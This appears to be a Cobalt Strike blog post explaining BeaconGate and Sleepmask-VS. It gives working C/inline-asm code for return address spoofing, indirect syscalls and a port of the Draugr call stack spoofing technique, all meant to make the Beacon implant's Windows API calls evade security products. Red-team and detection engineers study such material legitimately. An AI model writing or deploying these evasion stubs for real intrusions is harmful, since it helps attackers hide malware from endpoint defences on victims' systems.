TL;DR: In this blog we’ll demonstrate how to instrument Beacon via BeaconGate and walk through our implementations of return address spoofing, indirect syscalls, and a call stack spoofing technique, Draugr, that are now available in Sleepmask-VS. Furthermore, we’ll provide tips and tricks for developers in getting set up with Sleepmask-VS so they can write their own custom call gates.

BeaconGate

Raphael Mudge, the creator of Cobalt Strike, recently released a blog outlining his reflections on security research over the last decade. One key takeaway from this blog was the importance of tools which enable security researchers to quickly test and incorporate a hypothesis into the attack chain. This has always been the magic of Cobalt Strike, from BOFs to UDRLs, as it provides a vehicle for weaponizing an offensive technique and highlighting defensive blind spots as part of a full attack chain. This is one of the key principles still driving Cobalt Strike development; we are passionate about making tooling for security researchers to push the boundaries and to feed the security conversation. 
 
Call stack spoofing is one such example. When I wrote my initial CallStackSpoofer PoC, there was very little public tooling which supported call stack spoofing. For example, the only viable way to embed custom techniques into an attack chain with Cobalt Strike was via a UDRL, as it makes it possible to instrument Beacon at runtime via IAT hooking. Whilst this approach is extremely powerful, it relies on custom loading strategies and developing PIC, which means it can have a high barrier to entry. Hence, the OODA loop for call stack spoofing tradecraft can be slow and painful to iterate on. 

In Cobalt Strike 4.10 we introduced BeaconGate, which was aimed at solving this problem. BeaconGate enables users to customise how WinAPI functions are called by Beacon. With BeaconGate configured, Beacon will proxy its Windows API calls to be executed via the Sleepmask (i.e. similar to a remote procedure call).

Fig 1. A high-level schematic of how BeaconGate works.

Because you can now add custom instrumentation via the Sleepmask BOF to functions other than Sleep, it is possible to completely change Beacon’s runtime behaviour by simply loading in different Sleepmasks. In this sense, BeaconGate can be seen as a BOF alternative to the IAT-style hooking used by UDRLs such as TitanLdr. Instead of having to develop complex PIC + IAT hooking logic, users can simply configure Malleable C2 (stage.beacon_gate) to proxy functions of interest and use their own custom Sleepmask BOF.

Furthermore, as part of Cobalt Strike 4.10, we also released Sleepmask-VS, which provides a full mocking and development template for writing custom call gates with BeaconGate. This makes it much simpler (and quicker) to develop custom call stack spoofing routines and bake them directly into Cobalt Strike’s attack chain. 

As part of this blog release, we have now updated Sleepmask-VS to contain three different BeaconGate PoC examples: 

  • Return address spoofing 
  • Indirect syscalls 
  • A port of NtDallas’ Draugr call stack spoofing 

In this blog, we will walk through our implementations of the three techniques listed above. In doing so we aim to demonstrate the software contract used by BeaconGate and show how it can be used to quickly PoC, debug, and weaponise your own custom call stack spoofing routines in Cobalt Strike. 

Getting Started With BeaconGate

The best way to start hacking with BeaconGate is to clone Sleepmask-VS.

Note: If you download the repo as a zip there are some extra steps you will need to perform; see the README for more guidance. 

The main requirement for the latest Sleepmask-VS release is that you will now need to install the C++ Clang tools for Windows for Visual Studio. We have added a Clang dependency because many call stack spoofing routines require assembly stubs and Clang supports inline asm for X64, making development much simpler. As a consequence, the examples released as part of this blog will not compile out of the box with compilers that do not support X64 inline asm.

To install Clang, open Visual Studio and go to Tools->Get Tools and Features and select the C++ Clang tools for Windows checkbox, as shown below. You will then need to select Modify and restart Visual Studio for it to update.

Fig 2. The Visual Studio Installer GUI showing the C++ Clang tools for Windows checkbox.

Once you have successfully installed Clang and confirmed Sleepmask-VS successfully builds, you are in a position to start debugging and developing custom call gates.

Note: The switch to Clang in Sleepmask-VS has resulted in IntelliSense occasionally reporting spurious errors within the Visual Studio solution. This is because IntelliSense typically analyzes the code based on the MSVC compiler and hence it does not understand Clang-specific constructs such as its inline asm syntax.

By default, the Sleepmask-VS debug build will start running the default-sleepmask.exe.  To debug a different Sleepmask you will need to right click the sleepmask-vs solution, and select Properties->Debugging. Here you can edit the Command parameter to launch different debug Sleepmasks as shown below: 

Fig 3. The Sleepmask-VS Property Pages for Debugging. This allows users to modify the Command which is run for the Debug build. This can be modified to run the debug .exe of different Sleepmasks.

Note: Ensure your configuration is the Active(Debug) build (as opposed to Release) as illustrated in the red box above. 

Additionally, Sleepmask-VS makes it easy to step through inline asm; you can set a breakpoint on your target asm function stub and hit Alt+8 to trigger the Disassembly window and F11 to step through, as demonstrated below:

Fig 4. A screenshot showing Visual Studio‘s Disassembly window, which can be used to step through inline asm.

How BeaconGate Works

When Beacon attempts to call a supported API, such as VirtualAlloc (see the full supported API set here), it will:

  1. Check if BeaconGate has been enabled for the target function.
  2. If so, Beacon will pack the call into a FUNCTION_CALL structure and then invoke the Sleepmask (passing the FUNCTION_CALL).
  3. The Sleepmask will then execute the target WinAPI via whatever implementation the user desires.

The full definition of the FUNCTION_CALL struct can be found below:

typedef struct _FUNCTION_CALL { 
    PVOID functionPtr;  // Ptr to target function to call 
    WinApi function;  // Enum representing target WinApi 
    int numOfArgs;  // Number of arguments 
    ULONG_PTR args[MAX_BEACON_GATE_ARGUMENTS]; //Array of arguments 
    BOOL bMask;  // Do you want to mask Beacon? 
    ULONG_PTR retValue;  // Return value (this must be filled in)
} FUNCTION_CALL, * PFUNCTION_CALL;

Sleepmask-VS allows us to debug/step through the entry point of the Sleepmask, as shown in the screenshot below:

Fig 5. The entry point of the default Sleepmask being debugged in Sleepmask-VS.

In this example, the Sleepmask has been invoked and received a pointer to a FUNCTION_CALL structure. This shows that Beacon wants to call kernel32!VirtualAlloc and that there are four arguments passed, which in turn can be found in the args array. The args array is analogous to a CONTEXT structure, in that rcx == args[0], rdx == args[1] etc.

By default, BeaconGate is just a generic function dispatcher based on Railgun. It will simply cast the functionCall->functionPtr to be a generic function pointer for the given number of arguments and call it (i.e. retValue = beaconGate(04) (arg(0), arg(1), arg(2), arg(3));). However, the FUNCTION_CALL structure contains all the information needed to execute the ‘atomic’ function, and hence there are much more interesting things we can do, as this blog will demonstrate.
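To make the "cast and call" idea concrete, here is a minimal, portable sketch of an arity-based dispatcher. It is not the code from gate.cpp: MockFunctionCall, kMaxArgs, DispatchCall and Sum4 are hypothetical names used only for illustration, and only zero to four arguments are handled to keep it short.

```cpp
#include <cassert>
#include <cstdint>

// Simplified stand-in for FUNCTION_CALL (an assumption for this sketch).
constexpr int kMaxArgs = 10;  // hypothetical; the real limit is MAX_BEACON_GATE_ARGUMENTS

struct MockFunctionCall {
    void*     functionPtr;     // target function to call
    int       numOfArgs;       // number of valid entries in args
    uintptr_t args[kMaxArgs];  // arguments in calling-convention order
    uintptr_t retValue;        // filled in by the dispatcher
};

// One function pointer type per supported arity.
using Fn0 = uintptr_t (*)();
using Fn1 = uintptr_t (*)(uintptr_t);
using Fn2 = uintptr_t (*)(uintptr_t, uintptr_t);
using Fn3 = uintptr_t (*)(uintptr_t, uintptr_t, uintptr_t);
using Fn4 = uintptr_t (*)(uintptr_t, uintptr_t, uintptr_t, uintptr_t);

// Cast functionPtr to the signature matching numOfArgs, call it, and store
// the result in retValue. Returns false for arities this sketch does not cover.
inline bool DispatchCall(MockFunctionCall* call) {
    assert(call != nullptr && call->functionPtr != nullptr);
    const uintptr_t* a = call->args;
    void* fn = call->functionPtr;
    switch (call->numOfArgs) {
    case 0: call->retValue = reinterpret_cast<Fn0>(fn)(); return true;
    case 1: call->retValue = reinterpret_cast<Fn1>(fn)(a[0]); return true;
    case 2: call->retValue = reinterpret_cast<Fn2>(fn)(a[0], a[1]); return true;
    case 3: call->retValue = reinterpret_cast<Fn3>(fn)(a[0], a[1], a[2]); return true;
    case 4: call->retValue = reinterpret_cast<Fn4>(fn)(a[0], a[1], a[2], a[3]); return true;
    default: return false;
    }
}

// Example target taking four pointer-sized arguments.
inline uintptr_t Sum4(uintptr_t a, uintptr_t b, uintptr_t c, uintptr_t d) {
    return a + b + c + d;
}
```

Because every argument is stored as a pointer-sized integer, the dispatcher does not need to know anything about the target API beyond its argument count, which is what makes the structure a convenient hook point.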

API Monitor

We can start by demonstrating a very basic example of using BeaconGate as an API monitor for Beacon. Firstly, we need to enable BeaconGate in our Malleable C2 profile. This can be done via adding the following to the stage block:

stage {
        [ ... ]
        beacon_gate {
            All;
        }
}

Secondly, we can enable verbose logging in release builds for all our custom Sleepmasks in Sleepmask-VS via setting the ENABLE_LOGGING define in debug.h, as shown below:

Fig 6. A screenshot of debug.h showing the ENABLE_LOGGING define which can be used to enable verbose logging in release builds of custom Sleepmasks.

With this enabled, all Sleepmask logging will use OutputDebugString and hence can be viewed using SysInternals’ DebugView or by attaching a debugger such as WinDbg. By compiling the Sleepmask BOF with logging enabled, we immediately get runtime visibility into what Beacon is calling under the hood via BeaconGate. Hence, you can view all supported API activity without needing to use something like APIMonitor.

Note: You can also view Sleepmask debug logging via attaching to a process hosting Beacon with WinDbg / x64Dbg. This has the added advantage that you can also set breakpoints on specific functions (e.g. bp ntdll!NtAllocateVirtualMemory). This is particularly useful when sanity checking call stack spoofing techniques as we will see later. 
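As an illustration of the kind of log line an API monitor could produce from a proxied call, the sketch below formats a call record into a string. It is a host-side illustration only and not the Sleepmask-VS logging code: MockWinApi, kApiNames, MockFunctionCall and DescribeCall are hypothetical, and a real Sleepmask BOF would pass a similar message to its logging macro rather than build a std::string.

```cpp
#include <cassert>
#include <cstdint>
#include <cstdio>
#include <string>

// Hypothetical subset of the proxied API enum and matching display names.
enum class MockWinApi { VIRTUALALLOC, VIRTUALPROTECT, COUNT };
static const char* const kApiNames[] = { "VirtualAlloc", "VirtualProtect" };

// Simplified stand-in for FUNCTION_CALL (an assumption for this sketch).
struct MockFunctionCall {
    MockWinApi function;   // which API is being proxied
    int        numOfArgs;  // number of valid entries in args
    uintptr_t  args[10];   // raw pointer-sized arguments
};

// Build a one-line description such as "SLEEPMASK: VirtualAlloc(0x0, 0x1000)".
inline std::string DescribeCall(const MockFunctionCall& call) {
    assert(call.function < MockWinApi::COUNT);
    assert(call.numOfArgs >= 0 && call.numOfArgs <= 10);
    std::string line = "SLEEPMASK: ";
    line += kApiNames[static_cast<int>(call.function)];
    line += "(";
    char buf[32];
    for (int i = 0; i < call.numOfArgs; ++i) {
        // Prefix every argument after the first with a separator.
        std::snprintf(buf, sizeof(buf), "%s0x%llx", i ? ", " : "",
                      static_cast<unsigned long long>(call.args[i]));
        line += buf;
    }
    line += ")";
    return line;
}
```

For a VirtualAlloc call with the arguments NULL, 0x1000, MEM_RESERVE | MEM_COMMIT (0x3000) and PAGE_EXECUTE_READWRITE (0x40), this produces a line listing the four raw argument values in order.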

We can now rebuild the release build and load the sleepmask.cna script into the Cobalt Strike client (Cobalt Strike->Script Manager->Load). This will present a new GUI option (Sleepmask) which will allow you to select which Sleepmask you would like to apply to all exported Beacon payloads:

Fig 7. A screenshot showing the sleepmask.cna script loaded into the Cobalt Strike client. This script will add a new GUI option which enables users to configure which Sleepmask is automatically applied to all exported Beacon payloads.

For this first example, we will stick with the default-sleepmask with logging enabled. If we generate and execute a new Beacon payload, we can open DebugView and observe Beacon’s runtime behaviour. For example, running the BOF below (virtualalloc.x64.o) generates the corresponding debug output shown in DebugView.

void go(char* args, int len) { 
    LPVOID pBuffer = BeaconVirtualAlloc(NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 
    if (pBuffer) { 
        BeaconPrintf(CALLBACK_OUTPUT, "Allocated memory at: %p", pBuffer);
    } 
    else { 
        BeaconPrintf(CALLBACK_ERROR, "Failed to allocate memory");
    } 
}
Fig 8. A screenshot showing the debug logging of the default-sleepmask BOF captured in DebugView. The output shows that a call to VirtualAlloc was proxied by Beacon to the Sleepmask.

When BeaconVirtualAlloc is called, Beacon will check if BeaconGate has been enabled for the target function and if so, it will pack the function call and dispatch it to the Sleepmask to be executed. The idea behind this is that you can route all your sensitive BOF APIs to your custom call gate/call stack spoofing routine to avoid code duplication. This flow is demonstrated in the diagram below:

Fig 9. The high-level execution flow of Beacon<WinAPI> calls (i.e. BeaconVirtualAlloc) being proxied to BeaconGate.

Return Address Spoofing

The second example we will cover in this blog is return address spoofing. The idea behind our implementation is that we want to apply return address spoofing automatically to every WinAPI proxied by Beacon. The obvious use case is to ensure that Beacon’s WinAPI calls do not appear to originate from unbacked memory, in order to bypass a particular security product.

It is worth considering how it would be possible to achieve this through IAT hooking in a UDRL. We would need to place IAT hooks for every suspicious function we anticipated Beacon would use, re-write a short wrapper for every hooked function, and then re-direct them to our spoofing call gate. Furthermore, given the recent detection interest in anomalous call stacks, the list of suspicious functions may only grow. This could become quite painful from a UDRL developer’s perspective.

However, using BeaconGate we can apply return address spoofing for every proxied WinApi call with very little effort (i.e. we don’t really care what API we’re calling, we just want to apply technique X to it). 
 
We discussed in the ‘How BeaconGate Works’ section that, by default, BeaconGate is a simple function dispatcher. It will simply cast the functionCall->functionPtr to be a generic function pointer for the given number of arguments and call it. For example, if the functionCall->functionPtr contains the address of VirtualAlloc, it will cast the address of VirtualAlloc as a function pointer with four arguments and call it.  

However, there is nothing stopping us from overwriting this function pointer and hence re-directing execution flow somewhere else.  Therefore, we can apply return address spoofing universally by simply overwriting the functionCall->functionPtr to point at our return address spoofing routine. The normal default BeaconGate dispatcher will handle the arguments, meaning that we can apply return address spoofing to any function forwarded by Beacon with minimal effort. We can then tweak what functions we apply return address spoofing to via the stage.beacon_gate Malleable C2 option. 

Note: A nice trick is that if we set our asm function/stub to be variadic (i.e. DoSyscall(...)) the compiler will handle passing the correct number of arguments for us. 
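The pointer-overwrite trick can be illustrated without any assembly. In the hedged sketch below, an ordinary C++ function stands in for the asm stub and a fixed four-argument dispatcher stands in for the BeaconGate call gate; MockFunctionCall, MockSpoofInfo, MockSpoofStub, RedirectThroughStub, DispatchFourArgs and Multiply4 are all hypothetical names, and no return address is actually spoofed here.

```cpp
#include <cassert>
#include <cstdint>

// Simplified stand-in for FUNCTION_CALL, fixed at four arguments for brevity.
struct MockFunctionCall {
    void*     functionPtr;
    uintptr_t args[4];
    uintptr_t retValue;
};

using Fn4 = uintptr_t (*)(uintptr_t, uintptr_t, uintptr_t, uintptr_t);

// Global configuration read by the stub, mirroring the idea of a global
// RET_SPOOF_INFO. timesRouted exists only so the redirection can be observed.
struct MockSpoofInfo {
    void* TargetFunction;
    int   timesRouted;
};
static MockSpoofInfo gMockSpoofInfo = { nullptr, 0 };

// Stand-in for the asm stub: a real stub would swap the return address
// before jumping to the target; this one only forwards the call.
inline uintptr_t MockSpoofStub(uintptr_t a, uintptr_t b, uintptr_t c, uintptr_t d) {
    assert(gMockSpoofInfo.TargetFunction != nullptr);
    ++gMockSpoofInfo.timesRouted;
    return reinterpret_cast<Fn4>(gMockSpoofInfo.TargetFunction)(a, b, c, d);
}

// Remember the real target, then point the call at the stub instead.
inline void RedirectThroughStub(MockFunctionCall* call) {
    gMockSpoofInfo.TargetFunction = call->functionPtr;
    call->functionPtr = reinterpret_cast<void*>(&MockSpoofStub);
}

// Unmodified generic dispatcher: it simply calls whatever functionPtr holds.
inline void DispatchFourArgs(MockFunctionCall* call) {
    call->retValue = reinterpret_cast<Fn4>(call->functionPtr)(
        call->args[0], call->args[1], call->args[2], call->args[3]);
}

// Example target.
inline uintptr_t Multiply4(uintptr_t a, uintptr_t b, uintptr_t c, uintptr_t d) {
    return a * b * c * d;
}
```

The dispatcher is untouched: the only change is which address it is handed, which is why the same approach applies to any proxied function.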

At a high-level then, to implement return address spoofing within BeaconGate, we need to: 

  • Find a gadget in the current process (typically one that jumps based on a non-volatile register, e.g. jmp [rbx])
  • Redirect all incoming WinAPI calls to the return address spoofing stub 

Note: In our implementation, we also check what the incoming function is and locate an appropriate gadget for it (i.e. InternetConnectA will only use a gadget found in WinINet.dll). 
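The gadget search in the first step amounts to a byte-pattern scan. The sketch below looks for the two-byte encoding FF 23 (jmp qword ptr [rbx]) in an arbitrary buffer; FindJmpRbxGadget is a hypothetical helper, and a real implementation would scan the executable section of a loaded module rather than a test array.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Return the offset of the first "jmp qword ptr [rbx]" (FF 23) in the buffer,
// or -1 if the pattern does not occur.
inline std::ptrdiff_t FindJmpRbxGadget(const uint8_t* code, std::size_t size) {
    assert(code != nullptr || size == 0);
    for (std::size_t i = 0; i + 1 < size; ++i) {
        if (code[i] == 0xFF && code[i + 1] == 0x23) {
            return static_cast<std::ptrdiff_t>(i);
        }
    }
    return -1;
}
```

Note that the scan does not care about instruction boundaries, so a match can land in the middle of a longer instruction. That is perfectly usable as a gadget, but it also means the resulting return address is unlikely to follow a real call instruction.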

Our X64 return address spoofing implementation can be seen below:

typedef struct _RET_SPOOF_INFO {
    void* RopGadget;          //0
    void* TargetFunction;           //8
    void* RestoreRegister;          //16
    void* OriginalRetAddress;       //24
} RET_SPOOF_INFO, * PRET_SPOOF_INFO;

/**
*  A modified version of namazso's X64 Return Address Spoofer.
*
* Ref: https://www.unknowncheats.me/forum/anti-cheat-bypass/268039-x64-return-address-spoofing-source-explanation.html
* Ref: https://github.com/kyleavery/AceLdr
*
* @param (...) means this asm stub can be called with a variable number of args.
*
* Returns a ULONG_PTR with the result from the target function.
*/
#ifdef _WIN64
// This attribute ensures the compiler generates code without prolog / epilog code.
__attribute__((naked))
ULONG_PTR SpoofReturnAddressx64(...) {
    __asm {
        pop r11    // Save the real return address to r11
        mov rax, gRetSpoofInfo    // Get ptr to global gRetSpoofInfo struct (RET_SPOOF_INFO)
        mov r10, [rax]    // Store the trampoline gadget in r10 (gRetSpoofInfo->RopGadget / +0)
        push r10    // Push trampoline gadget to stack
        mov r10, [rax + 0x8]    // Save target function into r10 (gRetSpoofInfo->TargetFunction / +8)
        mov [rax + 0x18], r11    // Save the original return address to gRetSpoofInfo->OriginalRetAddress / +24
        mov [rax + 0x10], rbx    // Store the original value of rbx in gRetSpoofInfo->RestoreRegister
        
        lea rbx, [rip + 0x9]    // Load the effective address of our cleanup code (x64 allows rip relative addressing); +0x9 skips the next three 3-byte instructions
        mov [rax], rbx    // Save ptr to clean up in gRetSpoofInfo->RopGadget / +0 (this will overwrite original gadget)
        mov  rbx, rax    // Set rbx to gRetSpoofInfo, the jmp [rbx] gadget will dereference and jump to cleanup code
        jmp r10    // Execute the target function

        push [rbx + 0x18]    // Need to push original ret address to fix stack (gRetSpoofInfo->OriginalRetAddress / +24)
        mov rbx, [rbx + 0x10]    // Restore the original rbx value from gRetSpoofInfo->RestoreRegister / +16
        ret
    }
}
#endif // _WIN64

Note: Our return address spoofing stub is variadic so that it can be called through the standard BeaconGate call gate and hence uses a global structure RET_SPOOF_INFO (accessed via gRetSpoofInfo) to configure it. This was by design so that we do not need to re-write the BeaconGate dispatcher logic (found in sleepmask-vs/library/gate.cpp). It could be refactored to not use globals, but you would need to re-write the dispatcher code. This is the approach the draugr-sleepmask uses, see sleepmask-vs/library/stackspoofing.cpp. Additionally, this approach has the advantage that we do not need to pass configuration parameters as arguments to the stub or modify the shadow stack.

The screenshot below shows a Beacon payload being instrumented by the retaddrspoofing-sleepmask BOF (with logging enabled): 

Fig 10. A screenshot showing Beacon being instrumented with the retaddrspoofing-sleepmask BOF. In this example, we have attached WinDbg to the Beacon process and set a breakpoint on KERNELBASE!VirtualAlloc. We then executed the virtualalloc.x64.o BOF via inline-execute, which triggered the breakpoint. The knf command in WinDbg is then used to display the call stack, showing return address spoofing in action.

Indirect Syscalls

The third example we will cover is implementing indirect syscalls in BeaconGate. Before diving into the implementation details, it is important to stress that BeaconGate was intended to be as flexible as possible. Hence, Beacon will always proxy the higher-level API call (as opposed to the Nt* / syscall equivalent). The rationale behind this design choice was that if direct / indirect syscalls ever become irrelevant, an operator does not need to re-create the whole ‘clean’ stack chain upwards. 
 
However, this does mean that in order to implement custom syscall techniques, we need to expose a translation layer between the higher and lower-level function for performing syscalls (i.e. from VirtualAlloc to NtAllocateVirtualMemory). Our implementation of this translation layer can be found in sleepmask-vs/library/syscallapi.cpp.  

The high-level flow is that the Sleepmask will check what function Beacon is proxying and forward it to the appropriate wrapper function. The wrapper function is responsible for doing any necessary translation between the high-level and low-level API. For some APIs this is trivial, as you simply ‘pass through’ the arguments to the syscall. However, some do require significant modification (e.g. OpenProcess –> NtOpenProcess).  

An example of this flow for GetThreadContext can be seen below.

// 1. The sleep_mask is passed a FUNCTION_CALL structure which is passed in turn to the SysCallDispatcher.
void sleep_mask(PSLEEPMASK_INFO info, PFUNCTION_CALL functionCall) {
    [ ... ]
    if (info->reason == DEFAULT_SLEEP || info->reason == PIVOT_SLEEP) {
        DLOGF("SLEEPMASK: Sleeping\n");
        SleepMaskWrapper(info);
    }
    else if (info->reason == BEACON_GATE) {
            [ ... ]
            DLOGF("SLEEPMASK: Routing call to its sys call equivalent and executing indirect syscall...\n", winApiArray[functionCall->function]);
            SysCallDispatcher(info, functionCall);
    }
}

// 2. The SysCallDispatcher will check the incoming function and route it to relevant low level wrapper.
void SysCallDispatcher(PSLEEPMASK_INFO info, PFUNCTION_CALL functionCall) {
    [...] 
    else if (functionCall->function == WinApi::GETTHREADCONTEXT) NtGetContextThreadWrapper(functionCall); 
    [...] 
}

// 3. The wrapper function will perform the necessary translation of arguments and execute the syscall.
/**
* GetThreadContext --> NtGetContextThread
*
*    arg[0] [in] HANDLE hThread           -->   [0] [in] HANDLE ThreadHandle
*    arg[1] [in, out] LPCONTEXT lpContext -->   [1] [OUT] PCONTEXT pContext
*/
void NtGetContextThreadWrapper(PFUNCTION_CALL functionCall) {
    NTSTATUS ntStatus = 0;

    ntStatus = _NtGetContextThread((HANDLE)functionCall->args[0], (PCONTEXT)functionCall->args[1]);
    if (NT_SUCCESS(ntStatus)) {
        functionCall->retValue = TRUE;
    }
    else {
        functionCall->retValue = FALSE;
    }
}

In summary, after the Sleepmask is invoked, the FUNCTION_CALL structure is passed to the SysCallDispatcher, which will in turn check what the incoming function is and route it to the appropriate wrapper function (in this case NtGetContextThreadWrapper). This function then simply ‘passes through’ the arguments (functionCall->args[0] etc.) to the lower-level API call (_NtGetContextThread) without any modification.

The _NtGetContextThread function is defined as an extern and so it is up to the user to expose / implement it for their specific call gate. Hence, you can plug in your own techniques without needing to modify / touch the translation layer.  
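For an API where the arguments cannot simply be passed through, the translation might look like the following portable sketch of VirtualAlloc to NtAllocateVirtualMemory. It is not the code from syscallapi.cpp: the mock types, VirtualAllocToNtWrapper and FakeNtAlloc are hypothetical, and the low-level function is injected as a function pointer here (rather than resolved as an extern at link time) purely so the example is self-contained.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

using MockNtStatus = int32_t;                                  // stand-in for NTSTATUS
inline bool MockNtSuccess(MockNtStatus s) { return s >= 0; }   // mirrors NT_SUCCESS

// Simplified stand-in for FUNCTION_CALL (an assumption for this sketch).
struct MockFunctionCall {
    int       numOfArgs;
    uintptr_t args[10];
    uintptr_t retValue;
};

// Mirrors the shape of NtAllocateVirtualMemory; the call gate supplies it.
using NtAllocFn = MockNtStatus (*)(void* process, void** baseAddress, uintptr_t zeroBits,
                                   size_t* regionSize, uint32_t allocationType, uint32_t protect);

// VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
//   --> NtAllocateVirtualMemory(CurrentProcess, &base, 0, &size, type, protect)
// The high-level API returns the base address (or NULL), not a status code.
inline void VirtualAllocToNtWrapper(MockFunctionCall* call, NtAllocFn ntAlloc) {
    assert(call != nullptr && ntAlloc != nullptr && call->numOfArgs == 4);
    void*  base = reinterpret_cast<void*>(call->args[0]);
    size_t size = static_cast<size_t>(call->args[1]);
    // (HANDLE)-1 is the pseudo handle for the current process.
    void* currentProcess = reinterpret_cast<void*>(static_cast<intptr_t>(-1));
    const MockNtStatus status = ntAlloc(currentProcess, &base, 0, &size,
                                        static_cast<uint32_t>(call->args[2]),
                                        static_cast<uint32_t>(call->args[3]));
    call->retValue = MockNtSuccess(status) ? reinterpret_cast<uintptr_t>(base) : 0;
}

// Fake low-level implementation used only to exercise the wrapper.
inline MockNtStatus FakeNtAlloc(void*, void** baseAddress, uintptr_t,
                                size_t* regionSize, uint32_t, uint32_t) {
    static unsigned char pool[0x1000];
    if (*regionSize > sizeof(pool)) {
        return static_cast<MockNtStatus>(0xC0000017);  // STATUS_NO_MEMORY
    }
    *baseAddress = pool;
    return 0;  // STATUS_SUCCESS
}
```

The wrapper owns all of the argument reshaping and return value conversion, so swapping in a different low-level implementation (direct syscalls, indirect syscalls, or something else) does not require touching it.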

For our indirect syscall implementation (found in indirectsyscalls.cpp), _NtGetContextThread is implemented as follows:

NTSTATUS _NtGetContextThread(HANDLE ThreadHandle, PCONTEXT ThreadContext) {
    PrepareSyscall(gSysCallInfo->syscalls.ntGetContextThread.sysnum, gSysCallInfo->syscalls.ntGetContextThread.jmpAddr);
    return DoSyscall(ThreadHandle, ThreadContext);
}

Note: Our implementation uses BeaconGetSysCallInformation on initialization to resolve all the required syscall numbers and jump addresses. These are then referenced via a global pointer (gSysCallInfo). This design choice made the _Nt* API interface cleaner (i.e. you don’t need to also pass pointers to syscall numbers), however this is just our example implementation and it could be refactored to avoid using globals. 

The PrepareSyscall/DoSyscall pattern was inspired by RecycledGate. PrepareSyscall sets the target jump address and syscall number and DoSyscall is a short asm stub which performs the actual jump to the target syscall, as shown below:

#define DoSyscall DoIndirectSyscallx64

/**
* Sets the globals currentJmpAddr/SysNum to target sys call.
*
* Note: This is inspired by RecycledGate:
* https://github.com/thefLink/RecycledGate/blob/main/Sample/Main.c#L95-L96
* however, it uses C instead of ASM to avoid the compiler
* overwriting the r10/r11 registers between calls.
*
* @param DWORD sysNum for current sys call.
* @param PVOID addr target jump address for sys call.
*/
void PrepareSyscall(DWORD sysNum, PVOID addr) {
    currentJmpAddr = addr;
    currentSysNum = sysNum;
}

/**
* x64 ASM stub for indirect sys call gate.
*
* @param (...) means this asm stub can be called with a variable number of args.
* @return NTSTATUS.
*/
__attribute__((naked))
NTSTATUS DoIndirectSyscallx64(...) {
    __asm {
        int 3    // Breakpoint compiled in for the debugging demonstration that follows
        mov r11, currentJmpAddr
        mov eax, currentSysNum
        mov r10, rcx
        jmp r11
    }
}

The screenshot below shows a Beacon payload which is being instrumented by the indirectsyscalls-sleepmask BOF. In this case however, we have compiled a __debugbreak()/int 3 at the start of the DoIndirectSyscallx64 stub. Once again, we can execute the virtualalloc.x64.o BOF, which will in turn trigger a breakpoint just before the NtAllocateVirtualMemory indirect syscall is about to be made:

Fig 11. A screenshot showing an int 3 breakpoint being hit in WinDbg for a Beacon being instrumented with the indirectsyscalls-sleepmask BOF. This breakpoint has been compiled into the indirect syscall stub, DoSyscall.  At this point we can hit F11 to step through our asm stub and walk through the indirect syscall as it is executed.

Draugr

The final example this blog will cover is Draugr. This is a call stack spoofing technique based on LoudSunRun, which is essentially a combination of return address spoofing with a fake stack prepended to make it appear legitimate. This last example is intended to demonstrate how to quickly port an existing open-source technique into BeaconGate.  

As such, we have attempted to minimally modify the original PoC, however, we did have to make a couple of changes to make it more robust:

  • One thing to be aware of for call stack spoofing, whatever technique you implement, is that your top / ‘spoofed’ frame must be big enough to hold all the required arguments. If not, then you risk blitzing the call stack. As an example, to support ten arguments you will need a function that allocates at least 0x80 bytes ([return address] + [32 bytes of shadow space] + [arg 5] + [arg 6] + etc.). Our port of Draugr will only use gadgets which are found in functions with a stack space over this amount.
  • The X64 opcode parsing in Draugr was based on my initial unwinding code in CallStackSpoofer. This is the bare minimum implementation needed for most spoofed stacks, but occasionally Draugr would find gadgets where the function used more exotic unwind codes (in particular UWOP_SAVE_XMM128), which would occasionally cause crashes. Our PoC version ignores any gadgets found in functions which use these unwind codes.
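Both checks can be expressed as a single walk over a function's unwind codes. The sketch below follows the documented x64 UNWIND_CODE layout (16-bit slots holding prolog offset, operation and operation info) and is not the code from stackspoofing.cpp: UnwindOp, MakeSlot, ComputeFrameSize and IsUsableFrame are hypothetical names, chained unwind info is not handled, and treating UWOP_SET_FPREG and UWOP_PUSH_MACHFRAME as unsupported is a conservative assumption of this example.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Unwind operation codes from the Windows x64 exception-handling ABI.
enum class UnwindOp : uint8_t {
    PushNonvol = 0, AllocLarge = 1, AllocSmall = 2, SetFpReg = 3,
    SaveNonvol = 4, SaveNonvolFar = 5, SaveXmm128 = 8, SaveXmm128Far = 9,
    PushMachFrame = 10
};

// Pack one 16-bit slot: prolog offset in bits 0-7, op in bits 8-11, info in bits 12-15.
constexpr uint16_t MakeSlot(uint8_t prologOffset, UnwindOp op, uint8_t opInfo) {
    return static_cast<uint16_t>(prologOffset | (static_cast<unsigned>(op) << 8) |
                                 ((opInfo & 0xFu) << 12));
}

// Sum the stack bytes allocated by the prologue (return address not included).
// Returns false if an unsupported or truncated unwind code is encountered.
inline bool ComputeFrameSize(const uint16_t* slots, size_t count, uint32_t* frameSize) {
    assert(slots != nullptr && frameSize != nullptr);
    uint32_t total = 0;
    size_t i = 0;
    while (i < count) {
        const UnwindOp op = static_cast<UnwindOp>((slots[i] >> 8) & 0xF);
        const uint32_t info = (slots[i] >> 12) & 0xF;
        switch (op) {
        case UnwindOp::PushNonvol: total += 8; i += 1; break;
        case UnwindOp::AllocSmall: total += info * 8 + 8; i += 1; break;
        case UnwindOp::AllocLarge:
            if (info == 0 && i + 1 < count) {          // size / 8 in the next slot
                total += slots[i + 1] * 8u; i += 2;
            } else if (info == 1 && i + 2 < count) {   // 32-bit size in the next two slots
                total += slots[i + 1] | (static_cast<uint32_t>(slots[i + 2]) << 16); i += 3;
            } else {
                return false;
            }
            break;
        case UnwindOp::SaveNonvol:    i += 2; break;   // stores into already-allocated space
        case UnwindOp::SaveNonvolFar: i += 3; break;
        default: return false;  // SaveXmm128*, SetFpReg, PushMachFrame, unknown codes
        }
    }
    *frameSize = total;
    return true;
}

// A frame is usable if every code is understood and it is at least minBytes large.
inline bool IsUsableFrame(const uint16_t* slots, size_t count, uint32_t minBytes) {
    uint32_t size = 0;
    return ComputeFrameSize(slots, count, &size) && size >= minBytes;
}
```

With a filter like this, a candidate gadget is only accepted if IsUsableFrame succeeds for its containing function with the chosen threshold (0x80 in the example above).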

